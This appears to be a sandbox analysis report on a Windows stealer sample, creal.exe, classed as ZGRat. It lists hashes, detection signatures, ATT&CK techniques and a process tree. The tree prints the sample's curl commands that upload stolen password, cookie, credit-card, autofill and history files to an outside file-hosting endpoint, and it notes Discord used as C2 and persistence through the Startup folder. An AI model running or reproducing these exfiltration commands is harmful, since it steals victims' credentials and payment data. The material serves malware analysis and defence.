zgrat | f24dfb8c41bce571703b6950ee437e1b54448251a0a06ed8360f6a72ab113c9e

Analysis

max time kernel
118s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
13/05/2024, 06:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creal.exe
Size

16.2MB
MD5

f35e7eb4d2495e4fcef369ab293fb9b4
SHA1

28ae39be99ac6df812db772e8915625cef829271
SHA256

663cada20309d3c56295067882b73f0218d2b50968f66ac9e3cdd7c91d9b4d26
SHA512

c3fcf97ee27ccb0d72c755c287d3c05c3a48073db4e6aff7c63f296e33b648e5b738f60d697cd32432dabbbbcc6529701f56186211f6ffe65c24e6c658bced11
SSDEEP

393216:fEkMD2n9JWQsUcR4NzQW+eGQRCMTozGxu8C0ibfz6e57v1TNm:fUDa9YQFIW+e5RLoztZ026e5BJm

Score

10^/10

zgrat discovery evasion rat spyware stealer

Malware Config

Signatures

Detect ZGRat V1 2 IoCs

resource	yara_rule
behavioral1/memory/6124-593-0x00000172798E0000-0x0000017279C62000-memory.dmp	family_zgrat_v1
behavioral1/memory/3428-771-0x000001645EA00000-0x000001645ED82000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3676	netsh.exe
748	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	FiddlerSetup.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe	creal.exe

Executes dropped EXE 5 IoCs

pid	Process
4776	FiddlerSetup.5.0.20242.10753-latest.exe
1316	FiddlerSetup.exe
4944	SetupHelper
3428	Fiddler.exe
2028	Fiddler.exe

Loads dropped DLL 64 IoCs

pid	Process
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
4980	creal.exe
1316	FiddlerSetup.exe
2808	mscorsvw.exe
1852	mscorsvw.exe
5240	mscorsvw.exe
5524	mscorsvw.exe
1288	mscorsvw.exe
5832	mscorsvw.exe
5524	mscorsvw.exe
6124	mscorsvw.exe
6124	mscorsvw.exe
6124	mscorsvw.exe
6124	mscorsvw.exe
6124	mscorsvw.exe
5236	mscorsvw.exe
936	mscorsvw.exe
3600	mscorsvw.exe
3600	mscorsvw.exe
5320	mscorsvw.exe
5320	mscorsvw.exe
3600	mscorsvw.exe
3588	mscorsvw.exe
3428	Fiddler.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs

Web Service

T1102

flow	ioc
80	discord.com
69	discord.com
79	discord.com
82	discord.com
36	discord.com
49	discord.com
67	discord.com
70	discord.com
47	discord.com
48	discord.com
76	discord.com
78	discord.com
34	discord.com
71	discord.com
75	discord.com
77	discord.com
35	discord.com
63	discord.com
81	discord.com
37	discord.com
62	discord.com
59	discord.com
64	discord.com
38	discord.com
39	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org
17	api.ipify.org

Drops file in Windows directory 25 IoCs

description	ioc	Process
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\EnableLoopback\d12b539b25fd704b7b7ae29b10af66db\EnableLoopback.ni.exe.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\508-0\System.Data.SqlXml.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\3b5383dd37da6f390d4d4ad42fcb5b32\Microsoft.JScript.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\f85535a7092741215f67fdedf2846499\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1594-0\System.Deployment.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\96IC1UR5IC\System.EnterpriseServices.ni.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\CWEZ3EFTNO\System.Web.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e10-0\System.Web.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e04-0\System.EnterpriseServices.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\IAVF4939YH\Microsoft.JScript.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16c8-0\System.Runtime.Serialization.Formatters.Soap.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Web\44d302d3062a00a6bd5a39f743bdb4ef\System.Web.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\IAVF4939YH\Microsoft.JScript.ni.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\7355af105ad86679d6c9070a9b4dc0c3\System.Security.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e04-0\System.EnterpriseServices.Wrapper.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\96IC1UR5IC\System.EnterpriseServices.ni.dll.aux	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\af8-0\EnableLoopback.exe	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\73c-0\System.Security.dll	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\96IC1UR5IC\System.EnterpriseServices.Wrapper.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\22b31f1b9eca85580b198424dd16a98a\System.Data.SqlXml.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\18271de25c06b49b2aaa391461de2df6\System.Deployment.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Ente96d83b35#\a4659c51384187894a071aa2b9d900e7\System.EnterpriseServices.ni.dll.aux.tmp	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1478-0\System.Numerics.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ba90284a07d8bc0ce7e6273afa79210f\System.Numerics.ni.dll.aux.tmp	mscorsvw.exe
File opened for modification	C:\Windows\assembly\temp\CWEZ3EFTNO\System.Web.ni.dll	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3648	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	FiddlerSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "0"	FiddlerSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "9999"	FiddlerSetup.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133600555466387682"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\SAZ.ico"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\.saz	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -viewer \"%1\""	FiddlerSetup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{D0E3A0F4-2834-4F00-B97C-C190544D81BE}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\PerceivedType = "compressed"	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe\" -noattach \"%1\""	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\ = "Fiddler Session Archive"	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Content Type = "application/vnd.telerik-fiddler.SessionArchive"	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\DefaultIcon	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open	FiddlerSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Fiddler.ArchiveZip\Shell\Open &in Viewer\command	FiddlerSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\.saz\ = "Fiddler.ArchiveZip"	FiddlerSetup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2952	chrome.exe
2952	chrome.exe
1316	FiddlerSetup.exe
1316	FiddlerSetup.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
3428	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
5296	msedge.exe
5296	msedge.exe
5296	msedge.exe
5296	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3648	tasklist.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe
Token: SeCreatePagefilePrivilege	2952	chrome.exe
Token: SeShutdownPrivilege	2952	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe
2952	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3428	Fiddler.exe
3428	Fiddler.exe
2028	Fiddler.exe
2028	Fiddler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3688 wrote to memory of 4980	3688	creal.exe	92
PID 3688 wrote to memory of 4980	3688	creal.exe	92
PID 4980 wrote to memory of 768	4980	creal.exe	95
PID 4980 wrote to memory of 768	4980	creal.exe	95
PID 768 wrote to memory of 3648	768	cmd.exe	97
PID 768 wrote to memory of 3648	768	cmd.exe	97
PID 4980 wrote to memory of 3952	4980	creal.exe	100
PID 4980 wrote to memory of 3952	4980	creal.exe	100
PID 3952 wrote to memory of 5000	3952	cmd.exe	102
PID 3952 wrote to memory of 5000	3952	cmd.exe	102
PID 4980 wrote to memory of 4336	4980	creal.exe	103
PID 4980 wrote to memory of 4336	4980	creal.exe	103
PID 4336 wrote to memory of 3532	4336	cmd.exe	105
PID 4336 wrote to memory of 3532	4336	cmd.exe	105
PID 4980 wrote to memory of 1984	4980	creal.exe	106
PID 4980 wrote to memory of 1984	4980	creal.exe	106
PID 1984 wrote to memory of 2076	1984	cmd.exe	108
PID 1984 wrote to memory of 2076	1984	cmd.exe	108
PID 4980 wrote to memory of 3188	4980	creal.exe	109
PID 4980 wrote to memory of 3188	4980	creal.exe	109
PID 3188 wrote to memory of 4724	3188	cmd.exe	111
PID 3188 wrote to memory of 4724	3188	cmd.exe	111
PID 2952 wrote to memory of 4432	2952	chrome.exe	114
PID 2952 wrote to memory of 4432	2952	chrome.exe	114
PID 4980 wrote to memory of 2868	4980	creal.exe	115
PID 4980 wrote to memory of 2868	4980	creal.exe	115
PID 2868 wrote to memory of 5068	2868	cmd.exe	117
PID 2868 wrote to memory of 5068	2868	cmd.exe	117
PID 4980 wrote to memory of 2900	4980	creal.exe	118
PID 4980 wrote to memory of 2900	4980	creal.exe	118
PID 2900 wrote to memory of 4184	2900	cmd.exe	120
PID 2900 wrote to memory of 4184	2900	cmd.exe	120
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3196	2952	chrome.exe	122
PID 2952 wrote to memory of 3648	2952	chrome.exe	123

C:\Users\Admin\AppData\Local\Temp\creal.exe
"C:\Users\Admin\AppData\Local\Temp\creal.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3688
- C:\Users\Admin\AppData\Local\Temp\creal.exe
  "C:\Users\Admin\AppData\Local\Temp\creal.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3188
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile
      4⤵
      PID:4184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcbca1ab58,0x7ffcbca1ab68,0x7ffcbca1ab78
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:2
  2⤵
  PID:3196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=2128,i,13649646968343794457,1598147686198108577,131072 /prefetch:8
  2⤵
  PID:768
